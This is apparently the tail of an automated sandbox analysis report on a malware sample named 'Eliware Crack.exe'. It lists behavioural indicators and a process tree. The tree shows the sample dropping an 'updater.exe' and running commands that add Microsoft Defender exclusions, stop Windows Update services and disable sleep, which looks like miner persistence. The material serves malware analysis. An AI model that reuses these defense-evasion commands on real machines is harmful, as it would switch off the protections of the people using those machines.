Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe
Token: SeShutdownPrivilege	992	chrome.exe
Token: SeCreatePagefilePrivilege	992	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exetaskmgr.exe

pid	process
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
992	chrome.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
4312	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe
744	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

Eliware Crack.execli_gui.exe

pid process

4524 Eliware Crack.exe
4524 Eliware Crack.exe
112 cli_gui.exe
Suspicious use of UnmapMainImage 4 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exesvchost.exeRuntimeBroker.exe

pid process

4052 RuntimeBroker.exe
3048 RuntimeBroker.exe
2876 svchost.exe
4092 RuntimeBroker.exe

pid	process
4524	Eliware Crack.exe
4524	Eliware Crack.exe
112	cli_gui.exe

pid	process
4052	RuntimeBroker.exe
3048	RuntimeBroker.exe
2876	svchost.exe
4092	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 992 wrote to memory of 2456	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 2456	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 1772	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 932	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 932	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe
PID 992 wrote to memory of 4708	992	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:608

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:60

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2668

C:\Program Files\Microsoft\Edge\updater.exe
"C:\Program Files\Microsoft\Edge\updater.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:3300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1372

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1820

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x3d8
2⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2056

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Suspicious use of UnmapMainImage
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2884

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2992

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3356

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://oxy.name/d/BlQh
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7fffffe2ab58,0x7fffffe2ab68,0x7fffffe2ab78
3⤵
PID:2456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:2
3⤵
PID:1772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2252 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:4708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:1572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:3440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3988 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3056 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:4672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4496 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:2396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4056 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:3020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4088 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:1756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4824 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:2448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3300 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:3088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4488 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:2572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4052 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:1392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:4820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1540 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:2
3⤵
PID:724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4908 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:5648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4052 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:5288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:3300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5548 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:3352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5380 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:5956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4748 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:8
3⤵
PID:3100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=984 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:1632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4636 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:1200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5196 --field-trial-handle=1928,i,11163603164574296661,9087448709302848527,131072 /prefetch:1
3⤵
PID:2132

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4312

C:\Users\Admin\Desktop\Eliware Crack.exe
"C:\Users\Admin\Desktop\Eliware Crack.exe"
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4524

C:\Users\Admin\AppData\Local\Temp\cli_gui.exe
"C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:112

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\updater.exe
"C:\Users\Admin\AppData\Local\Temp\updater.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:4176

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3088

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2148

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2572

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1644

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2156

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4968

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:3856

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:4284

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3012

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2160

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
